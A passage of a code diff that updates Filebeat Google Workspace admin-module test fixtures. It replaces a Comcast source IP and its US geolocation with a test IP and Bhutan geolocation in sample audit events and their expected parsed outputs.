@@ -186,26 +174,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1341, + "log.offset": 1338, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -226,7 +210,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -240,26 +224,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1818, + "log.offset": 1814, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -280,7 +260,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -293,26 +273,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2298, + "log.offset": 2293, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -333,7 +309,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -346,26 +322,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2728, + "log.offset": 2722, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -386,7 +358,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -400,27 +372,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3157, + "log.offset": 3150, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log index c3166fb87d2b..9136bf3801f7 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log 
@@ -1,3 +1,3 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"TRANSFER_DOCUMENT_OWNERSHIP","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"DRIVE_DATA_RESTORE","parameters":[{"name":"BEGIN_DATE_TIME","value":"2002-10-02T12:00:00Z"},{"name":"END_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"CHANGE_DOCS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"TRANSFER_DOCUMENT_OWNERSHIP","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"DRIVE_DATA_RESTORE","parameters":[{"name":"BEGIN_DATE_TIME","value":"2002-10-02T12:00:00Z"},{"name":"END_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"CHANGE_DOCS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json
index 97f5e3b6b83e..75ac5bf0a4dc 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json
@@ -8,7 +8,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -25,24 +25,20 @@ "log.offset": 0, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -68,7 +64,7 @@ "event.end": "2002-10-02T15:00:00.000Z", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.start": "2002-10-02T12:00:00.000Z", "event.type": [ 
@@ -81,27 +77,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 471, + "log.offset": 470, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -126,7 +118,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -145,26 +137,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 967, + "log.offset": 965, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log index b452d9e8d945..6bb8cb627570 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log 
@@ -1,85 +1,85 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ACCOUNT_AUTO_RENEWAL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"NON_AUTO_RENEWAL"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_ENABLED","value":"app enabled"},{"name":"APPLICATION_NAME","value":"app name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION_TO_WHITELIST","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_NAME","value":"app name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ADVERTISEMENT_OPTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ALERT_CRITERIA","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_RECEIVERS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_ALERT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_STATUS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} 
